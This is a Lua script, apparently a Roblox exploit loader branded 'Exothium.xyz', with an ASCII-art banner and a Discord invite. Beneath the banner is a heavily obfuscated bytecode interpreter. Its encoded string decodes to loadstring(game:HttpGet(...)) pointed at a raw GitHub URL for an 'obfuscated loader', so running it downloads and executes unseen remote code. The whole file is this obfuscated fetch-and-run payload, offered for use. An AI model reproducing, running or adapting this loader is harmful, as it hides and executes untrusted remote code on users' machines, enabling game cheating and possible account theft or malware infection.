--[[
███████╗██╗  ██╗ ██████╗ ████████╗██╗  ██╗██╗██╗   ██╗███╗   ███╗   ██╗  ██╗
██╔════╝╚██╗██╔╝██╔═══██╗╚══██╔══╝██║  ██║██║██║   ██║████╗ ████║   ╚██╗██╔╝
█████╗   ╚███╔╝ ██║   ██║   ██║   ███████║██║██║   ██║██╔████╔██║    ╚███╔╝ 
██╔══╝   ██╔██╗ ██║   ██║   ██║   ██╔══██║██║██║   ██║██║╚██╔╝██║    ██╔██╗ 
███████╗██╔╝ ██╗╚██████╔╝   ██║   ██║  ██║██║╚██████╔╝██║ ╚═╝ ██║██╗██╔╝ ██╗
╚══════╝╚═╝  ╚═╝ ╚═════╝    ╚═╝   ╚═╝  ╚═╝╚═╝ ╚═════╝ ╚═╝     ╚═╝╚═╝╚═╝  ╚═╝
                                                                            
██╗   ██╗███████╗                                                           
╚██╗ ██╔╝╚══███╔╝                                                           
 ╚████╔╝   ███╔╝                                                            
  ╚██╔╝   ███╔╝                                                             
   ██║   ███████╗                                                           
   ╚═╝   ╚══════╝                                                           
                                                                            
                                                                            
                                                                            
█████╗█████╗█████╗█████╗█████╗█████╗█████╗█████╗█████╗█████╗█████╗          
╚════╝╚════╝╚════╝╚════╝╚════╝╚════╝╚════╝╚════╝╚════╝╚════╝╚════╝          
                                                                            
                                                                            
                                                                            
██████╗ ██╗   ██╗                                                           
██╔══██╗╚██╗ ██╔╝                                                           
██████╔╝ ╚████╔╝                                                            
██╔══██╗  ╚██╔╝                                                             
██████╔╝   ██║                                                              
╚═════╝    ╚═╝                                                              
                                                                            
 ██████╗██╗██╗     ███████╗██████╗ ████████╗███████╗██████╗                 
██╔════╝██║██║     ██╔════╝██╔══██╗╚══██╔══╝██╔════╝██╔══██╗                
██║     ██║██║     █████╗  ██████╔╝   ██║   █████╗  ██║  ██║                
██║     ██║██║     ██╔══╝  ██╔══██╗   ██║   ██╔══╝  ██║  ██║                
╚██████╗██║███████╗███████╗██║  ██║   ██║   ███████╗██████╔╝                
 ╚═════╝╚═╝╚══════╝╚══════╝╚═╝  ╚═╝   ╚═╝   ╚══════╝╚═════╝                 
                                                                            
                                                                            
                                                                            
█████╗█████╗█████╗█████╗█████╗█████╗█████╗█████╗█████╗█████╗█████╗          
╚════╝╚════╝╚════╝╚════╝╚════╝╚════╝╚════╝╚════╝╚════╝╚════╝╚════╝          
                                                                            
                                                                            
                                                                            
    ██████╗  ██████╗     ██╗███████╗██╗  ██╗ ██████╗ ████████╗██╗  ██╗██╗   
   ██╔════╝ ██╔════╝    ██╔╝██╔════╝╚██╗██╔╝██╔═══██╗╚══██╔══╝██║  ██║██║   
   ██║  ███╗██║  ███╗  ██╔╝ █████╗   ╚███╔╝ ██║   ██║   ██║   ███████║██║   
   ██║   ██║██║   ██║ ██╔╝  ██╔══╝   ██╔██╗ ██║   ██║   ██║   ██╔══██║██║   
██╗╚██████╔╝╚██████╔╝██╔╝   ███████╗██╔╝ ██╗╚██████╔╝   ██║   ██║  ██║██║   
╚═╝ ╚═════╝  ╚═════╝ ╚═╝    ╚══════╝╚═╝  ╚═╝ ╚═════╝    ╚═╝   ╚═╝  ╚═╝╚═╝   
                                                                            
██╗   ██╗███╗   ███╗                                                        
██║   ██║████╗ ████║                                                        
██║   ██║██╔████╔██║                                                        
██║   ██║██║╚██╔╝██║                                                        
╚██████╔╝██║ ╚═╝ ██║                                                        
 ╚═════╝ ╚═╝     ╚═╝                                                        

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v88=0;local v89;while true do if (v88==0) then v89=v5(v82,v19);v19=nil;v88=1;end if (v88==1) then return v89;end end else return v82;end end end);local function v20(v31,v32,v33) if v33 then local v83=(v31/((5 -3)^(v32-1)))%(2^(((v33-((1 + 1) -1)) -(v32-(1 -0))) + (2 -1))) ;return v83-(v83%(620 -(555 + 64))) ;else local v84=(933 -(857 + 74))^(v32-(569 -(58 + 309 + 201))) ;return (((v31%(v84 + v84))>=v84) and (928 -(214 + 713))) or 0 ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0;local v36;local v37;while true do if (v35==(877 -(282 + 595))) then v36,v37=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (1639 -(1523 + 114)) ;v35=1 + (117 -(32 + 85)) ;end if (v35==1) then return (v37 * (364 -108)) + v36 ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (9 -5) ;return (v41 * (31011612 -(14234576 -(67 + 113)))) + (v40 * (10657 + 3876 + 51003)) + (v39 * ((1487 -881) -(87 + 263))) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=1 + 0 ;local v45=(v20(v43,3 -2 ,972 -(802 + 65 + 85) ) * ((5 -3)^(57 -25))) + v42 ;local v46=v20(v43,16 + 5 ,(1818 -790) -(915 + 82) );local v47=((v20(v43,32)==(2 -1)) and  -(1 + 0)) or (1 -0) ;if (v46==(1187 -(1069 + (556 -(145 + 293))))) then if (v45==(0 -0)) then return v47 * (0 -0) ;else local v90=0 + 0 ;while true do if ((0 -0)==v90) then v46=1 + 0 ;v44=(1221 -(44 + 386)) -(368 + 423) ;break;end end end elseif (v46==(6433 -4386)) then return ((v45==(18 -(10 + 8))) and (v47 * ((3 -2)/((1928 -(998 + 488)) -(416 + 26))))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/(2^(165 -113)))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;local v50={};for v65=773 -(201 + 571) , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 1695 -(1229 + 466) ;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do local v67=(function() return 578 -(386 + 192) ;end)();while true do if (v67==0) then if (v51==(1206 -(696 + 510))) then local v95=(function() return 0;end)();while true do if (v95~=1) then else local v134=(function() return 0;end)();while true do if (v134==(0 -0)) then v54=(function() return {};end)();v55=(function() return {};end)();v134=(function() return 1263 -(1091 + 171) ;end)();end if (v134==(1 + 0)) then v95=(function() return 2;end)();break;end end end if (v95~=2) then else v51=(function() return 3 -2 ;end)();break;end if (0==v95) then v52=(function() return function(v145,v146,v147) local v148=(function() return 0;end)();local v149=(function() return;end)();while true do if (v148==(0 -0)) then v149=(function() return 0;end)();while true do if (v149~=0) then else local v169=(function() return 0;end)();while true do if (v169~=(374 -(123 + 251))) then else local v171=(function() return 0 -0 ;end)();while true do if (v171==0) then v145[v146-#"!" ]=(function() return v147();end)();return v145,v146,v147;end end end end end end break;end end end;end)();v53=(function() return {};end)();v95=(function() return 699 -(208 + 490) ;end)();end end end if (v51~=2) then else v56[ #"91("]=(function() return v21();end)();for v99= #",",v23() do local v100=(function() return v21();end)();if (v20(v100, #"[", #"<")==(0 + 0)) then local v135=(function() return 0;end)();local v136=(function() return;end)();local v137=(function() return;end)();local v138=(function() return;end)();while true do if (v135~=0) then else local v155=(function() return 0;end)();while true do if (v155==(1 + 0)) then v135=(function() return 1;end)();break;end if ((836 -(660 + 176))~=v155) then else v136=(function() return v20(v100,1 + 1 , #"asd");end)();v137=(function() return v20(v100, #"0313",208 -(14 + 188) );end)();v155=(function() return 1;end)();end end end if (v135==(678 -(534 + 141))) then if (v20(v137, #"asd", #"-19")== #"~") then v138[ #".com"]=(function() return v58[v138[ #".dev"]];end)();end v53[v99]=(function() return v138;end)();break;end if (v135==(1 + 1)) then if (v20(v137, #",", #"|")~= #"\\") then else v138[2 + 0 ]=(function() return v58[v138[2 + 0 ]];end)();end if (v20(v137,3 -1 ,2 -0 )~= #"\\") then else v138[ #"asd"]=(function() return v58[v138[ #"xxx"]];end)();end v135=(function() return 8 -5 ;end)();end if (v135==(1 + 0)) then v138=(function() return {v22(),v22(),nil,nil};end)();if (v136==(0 + 0)) then local v164=(function() return 396 -(115 + 281) ;end)();local v165=(function() return;end)();while true do if (0==v164) then v165=(function() return 0 -0 ;end)();while true do if (v165==(0 + 0)) then v138[ #"19("]=(function() return v22();end)();v138[ #".dev"]=(function() return v22();end)();break;end end break;end end elseif (v136== #",") then v138[ #"-19"]=(function() return v23();end)();elseif (v136==(4 -2)) then v138[ #"91("]=(function() return v23() -(2^(58 -42)) ;end)();elseif (v136== #"gha") then local v174=(function() return 0;end)();local v175=(function() return;end)();while true do if (v174==(867 -(550 + 317))) then v175=(function() return 0;end)();while true do if (v175==(0 -0)) then v138[ #"91("]=(function() return v23() -((2 -0)^16) ;end)();v138[ #"asd1"]=(function() return v22();end)();break;end end break;end end end v135=(function() return 5 -3 ;end)();end end end end for v101= #"!",v23() do v54,v101,v28=(function() return v52(v54,v101,v28);end)();end return v56;end v67=(function() return 1;end)();end if (v67==(286 -(134 + 151))) then if (v51~=1) then else local v97=(function() return 1665 -(970 + 695) ;end)();local v98=(function() return;end)();while true do if (v97~=(0 -0)) then else v98=(function() return 0;end)();while true do if (v98~=(1990 -(582 + 1408))) then else v56=(function() return {v53,v54,nil,v55};end)();v57=(function() return v23();end)();v98=(function() return 3 -2 ;end)();end if (v98==(2 -0)) then v51=(function() return 2;end)();break;end if (v98==(3 -2)) then v58=(function() return {};end)();for v157= #"}",v57 do local v158=(function() return 1824 -(1195 + 629) ;end)();local v159=(function() return;end)();local v160=(function() return;end)();while true do if (v158==0) then local v167=(function() return 0 -0 ;end)();while true do if (v167==1) then v158=(function() return 1;end)();break;end if (v167==0) then v159=(function() return v21();end)();v160=(function() return nil;end)();v167=(function() return 1;end)();end end end if ((242 -(187 + 54))==v158) then if (v159== #">") then v160=(function() return v21()~=(780 -(162 + 618)) ;end)();elseif (v159==(2 + 0)) then v160=(function() return v24();end)();elseif (v159~= #"19(") then else v160=(function() return v25();end)();end v58[v157]=(function() return v160;end)();break;end end end v98=(function() return 2 + 0 ;end)();end end break;end end end break;end end end end local function v29(v59,v60,v61) local v62=v59[1];local v63=v59[3 -1 ];local v64=v59[4 -1 ];return function(...) local v68=v62;local v69=v63;local v70=v64;local v71=v27;local v72=1 + 0 ;local v73= -(1637 -(1373 + 263));local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v85=0 + (0 -0) ,v76 do if (v85>=v70) then v74[v85-v70 ]=v75[v85 + (1 -0) ];else v78[v85]=v75[v85 + (1 -0) ];end end local v79=(v76-v70) + (1385 -(746 + 638)) ;local v80;local v81;while true do v80=v68[v72];v81=v80[1 + 0 ];if (v81<=(4 -1)) then if (v81<=1) then if ((v81==(341 -(218 + 123))) or (4449==2663)) then local v102;local v103,v104;local v105;local v106;v78[v80[1583 -(1535 + 46) ]]=v61[v80[3 + 0 ]];v72=v72 + 1 + 0 ;v80=v68[v72];v78[v80[562 -(306 + (2154 -(106 + 1794))) ]]=v61[v80[1 + 2 ]];v72=v72 + 1 ;v80=v68[v72];v106=v80[3 -1 ];v105=v78[v80[1470 -(899 + 568) ]];v78[v106 + 1 + 0 ]=v105;v78[v106]=v105[v80[9 -5 ]];v72=v72 + (604 -(268 + 335)) ;v80=v68[v72];v78[v80[292 -(60 + 230) ]]=v80[3];v72=v72 + (573 -(426 + 146)) ;v80=v68[v72];v106=v80[1 + 1 ];v103,v104=v71(v78[v106](v13(v78,v106 + (1457 -(282 + 1174)) ,v80[814 -(569 + 77 + 165) ])));v73=(v104 + v106) -1 ;v102=0 -0 ;for v139=v106,v73 do v102=v102 + 1 + 0 ;v78[v139]=v103[v102];end v72=v72 + (1025 -(706 + 318)) ;v80=v68[v72];v106=v80[1253 -(721 + 134 + 396) ];v78[v106]=v78[v106](v13(v78,v106 + (1272 -(945 + 326)) ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[4 -(5 -3) ]]();v72=v72 + (2 -1) + 0 ;v80=v68[v72];do return;end else do return;end end elseif ((v81>2) or (4166==455)) then local v121=v80[702 -(271 + 429) ];v78[v121]=v78[v121](v13(v78,v121 + (115 -(4 + 110)) + 0 ,v73));else local v123=(2084 -(57 + 527)) -(1408 + 92) ;local v124;local v125;while true do if (v123==1) then v78[v124 + (1428 -(41 + 1386)) ]=v125;v78[v124]=v125[v80[1090 -(461 + 625) ]];break;end if ((1288 -(993 + 295))==v123) then v124=v80[1 + 1 ];v125=v78[v80[1174 -(418 + 753) ]];v123=(104 -(17 + 86)) + 0 ;end end end elseif ((v81<=(1 + 4)) or (4277<2989)) then if (v81==(2 + 2)) then v78[v80[1 + 1 ]]=v80[3];else local v128=v80[(361 + 170) -(406 + 123) ];local v129,v130=v71(v78[v128](v13(v78,v128 + (1 -0) ,v80[3])));v73=(v130 + v128) -(1770 -(1749 + 20)) ;local v131=0 + (0 -0) ;for v142=v128,v73 do v131=v131 + (167 -(122 + 44)) ;v78[v142]=v129[v131];end end elseif (v81==(1328 -(1249 + 73))) then v78[v80[1 + 1 ]]=v61[v80[3]];else v78[v80[1147 -(466 + 679) ]]();end v72=v72 + (2 -1) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034D3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F536B69626964695369676D613132333132332F50442F6D61696E2F4C6F616465724F62667573636174656400083O00124O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
